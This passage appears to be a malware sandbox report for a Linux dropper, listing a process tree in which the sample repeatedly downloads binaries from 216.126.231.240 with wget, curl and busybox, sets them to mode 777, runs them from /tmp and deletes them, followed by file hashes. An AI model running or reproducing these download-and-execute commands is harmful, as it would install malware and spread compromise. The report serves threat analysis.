/bin/chmodchmod 777 i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵
- File and Directory Permissions Modification
PID:1626
-
-
/tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL./i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵
- Executes dropped EXE
PID:1627
-
-
/bin/rmrm i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵PID:1628
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵PID:1629
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵
- Writes file to tmp directory
PID:1630
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵PID:1631
-
-
/bin/chmodchmod 777 xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵
- File and Directory Permissions Modification
PID:1632
-
-
/tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu./xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵
- Executes dropped EXE
PID:1633
-
-
/bin/rmrm xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵PID:1634
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵PID:1635
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵
- Writes file to tmp directory
PID:1636
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵PID:1637
-
-
/bin/chmodchmod 777 2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵
- File and Directory Permissions Modification
PID:1638
-
-
/tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f./2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵
- Executes dropped EXE
PID:1639
-
-
/bin/rmrm 2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵PID:1640
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P2⤵PID:1641
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P2⤵
- Writes file to tmp directory
PID:1642
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P2⤵PID:1643
-
-
/bin/chmodchmod 777 MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P2⤵
- File and Directory Permissions Modification
PID:1644
-
-
/tmp/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P./MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P2⤵
- Executes dropped EXE
PID:1645
-
-
/bin/rmrm MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P2⤵PID:1646
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe2⤵PID:1647
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe2⤵
- Writes file to tmp directory
PID:1648
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe2⤵PID:1649
-
-
/bin/chmodchmod 777 6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe2⤵
- File and Directory Permissions Modification
PID:1650
-
-
/tmp/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe./6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe2⤵
- Executes dropped EXE
PID:1651
-
-
/bin/rmrm 6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe2⤵PID:1652
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy2⤵PID:1653
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy2⤵
- Writes file to tmp directory
PID:1654
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy2⤵PID:1655
-
-
/bin/chmodchmod 777 8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy2⤵
- File and Directory Permissions Modification
PID:1656
-
-
/tmp/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy./8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy2⤵
- Executes dropped EXE
PID:1657
-
-
/bin/rmrm 8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy2⤵PID:1658
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97